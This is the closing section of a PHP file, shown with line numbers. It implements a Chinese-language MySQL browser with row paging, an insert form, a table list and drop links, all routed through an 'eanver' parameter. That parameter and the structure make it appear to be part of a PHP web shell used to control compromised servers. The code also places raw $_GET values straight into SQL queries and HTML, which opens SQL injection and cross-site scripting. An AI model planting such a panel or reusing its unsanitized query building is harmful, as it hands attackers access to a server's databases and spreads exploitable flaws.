3123 echo '<td>' . nl2br(htmlspecialchars(Mysql_Len($text[$row], 500))) . "</td>";
3124 }
3125 echo "</tr>" . "\r\n";
3126 $v++;
3127 }
3128 echo "</table><div class=\"actall\">";
3129 $pagep = $page - 1;
3130 $pagen = $page + 1;
3131 echo "共有 " . $row_num . " 条记录 ";
3132 $pagenav = "";
3133 $pageStr = $row_num > 0 ? $page : "0";
3134 $charseta = isset($_GET['charset']) ? $_GET['charset'] : "";
3135 if ($pagep > 0) {
3136 $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=1&charset=" . $charseta . "'>首页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagep . "&charset=" . $charseta . "'>上一页</a> ";
3137 } else {
3138 $pagenav .= " 上一页 ";
3139 }
3140 if ($pagen <= $pages) {
3141 $pagenav .= " <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pagen . "&charset=" . $charseta . "'>下一页</a> <a href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p=" . $pages . "&charset=" . $charseta . "'>尾页</a>";
3142 } else {
3143 $pagenav .= " 下一页 ";
3144 }
3145 $pagenav .= " 第 [" . $pageStr . "/" . $pages . "] 页 跳到<input name='textfield' type='text' style='text-align:center;' size='4' value='" . $pageStr . "' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['table'] . "&p='+this.value+'&charset=" . $charseta . "';\" />页";
3146 echo $pagenav;
3147 echo "</div>";
3148 }
3149 } elseif (isset($_GET['insert'])) {
3150 echo "<a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['insert'] . '">' . $_GET['insert'] . "</a></div>";
3151 $result = @mysql_query("SELECT * FROM " . $_GET['insert'], $conn);
3152 $fieldnum = @mysql_num_fields($result);
3153 echo "<form method=\"POST\" action=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $_GET['insert'] . '">';
3154 for ($i = 0; $i < $fieldnum; $i++) {
3155 $name = @mysql_field_name($result, $i);
3156 $type = @mysql_field_type($result, $i);
3157 $len = @mysql_field_len($result, $i);
3158 echo "<div class=\"actall\">" . $name . " <font color=\"#FF0000\">" . $type . '(' . $len . ")</font><br><textarea name=\"insql[" . $name . "]\" style=\"width:600px;height:60px;\"></textarea></div>";
3159 }
3160 echo "<div class=\"actall\"><input type=\"submit\" value=\"Insert\" style=\"width:80px;\"></div></form>";
3161 } else {
3162 $query = "SHOW TABLE STATUS";
3163 $status = @mysql_query($query, $conn);
3164 while ($statu = @mysql_fetch_array($status)) {
3165 $statusize[] = $statu['Data_length'];
3166 $statucoll[] = $statu['Collation'];
3167 }
3168 $query = "SHOW TABLES FROM " . $_GET['db'] . ';';
3169 echo "</div><table border=\"0\"><tr><td class=\"toptd\" style=\"width:550px;\"> 表名 </td><td class=\"toptd\" style=\"width:80px;\"> 操作 </td><td class=\"toptd\" style=\"width:130px;\"> 字符集 </td><td class=\"toptd\" style=\"width:70px;\"> 大小 </td></tr>";
3170 $result = @mysql_query($query, $conn);
3171 $k = 0;
3172 while ($table = @mysql_fetch_row($result)) {
3173 $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_'));
3174 echo "<tr><td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . "&table=" . $table[0] . '">' . $table[0] . "</a></td>";
3175 echo "<td><a href=\"?eanver=mysql_msg&db=" . $_GET['db'] . '&insert=' . $table[0] . "\"> 插入 </a> <a href=\"#\" onclick=\"Delok('" . $table[0] . "','?eanver=mysql_msg&db=" . $_GET['db'] . '&drop=' . $table[0] . "');return false;\"> 删除 </a></td>";
3176 echo '<td>' . $statucoll[$k] . "</td><td align=\"right\">" . File_Size($statusize[$k]) . "</td></tr>" . "\r\n";
3177 $k++;
3178 }
3179 echo "</table>";
3180 }
3181 }
3182 } else {
3183 $cookietime = time() - 6 * 3600;
3184 setcookie($cookie_name_mysql . 'host', "", $cookietime);
3185 setcookie($cookie_name_mysql . 'port', "", $cookietime);
3186 setcookie($cookie_name_mysql . 'user', "", $cookietime);
3187 setcookie($cookie_name_mysql . 'pass', "", $cookietime);
3188 die("连接MYSQL失败,请重新登陆.<meta http-equiv=\"refresh\" content=\"1;URL=?eanver=mysql_exec\">");
3189 }
3190 break;
3191 default:
3192 html_main();
3193 break;
3194}
3195
3196css_foot();
3197ob_end_flush();